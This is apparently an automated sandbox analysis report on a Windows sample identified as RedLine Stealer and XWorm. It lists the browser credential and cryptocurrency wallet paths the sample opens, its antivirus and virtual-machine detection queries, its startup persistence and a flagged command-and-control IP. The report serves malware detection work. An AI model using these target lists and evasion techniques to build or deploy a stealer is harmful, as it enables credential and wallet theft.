Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004223BC
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004711D2 GetUserNameW, 0_2_004711D2
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_0042039F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1939017014.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: pteropod.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: pteropod.exe Binary or memory string: WIN_XP
Source: pteropod.exe Binary or memory string: WIN_XPe
Source: pteropod.exe Binary or memory string: WIN_VISTA
Source: pteropod.exe Binary or memory string: WIN_7
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1939017014.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_004741BB
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 0_2_0046483C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0047AD92
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_004741BB
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 1_2_0046483C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 1_2_0047AD92
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_004741BB
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 5_2_0046483C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 5_2_0047AD92
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538405 Sample: 7xonkSJwuY.exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 13 other signatures 2->37 7 7xonkSJwuY.exe 3 2->7         started        11 wscript.exe 1 2->11         started        process3 file4 25 C:\Users\user\AppData\Local\...\pteropod.exe, PE32 7->25 dropped 47 Contains functionality to detect sleep reduction / modifications 7->47 13 pteropod.exe 1 7->13         started        49 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->49 17 pteropod.exe 11->17         started        signatures5 process6 file7 27 C:\Users\user\AppData\...\pteropod.vbs, data 13->27 dropped 51 Multi AV Scanner detection for dropped file 13->51 53 Machine Learning detection for dropped file 13->53 55 Drops VBS files to the startup folder 13->55 61 2 other signatures 13->61 19 RegSvcs.exe 5 4 13->19         started        57 Writes to foreign memory regions 17->57 59 Maps a DLL or memory area into another process 17->59 23 RegSvcs.exe 1 17->23         started        signatures8 process9 dnsIp10 29 162.251.122.86, 49730, 49732, 57903 UNREAL-SERVERSUS Canada 19->29 39 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->39 41 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->41 43 Tries to harvest and steal browser information (history, passwords, etc) 19->43 45 Tries to steal Crypto Currency Wallets 19->45 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.251.122.86
 unknown Canada
64236 UNREAL-SERVERSUS true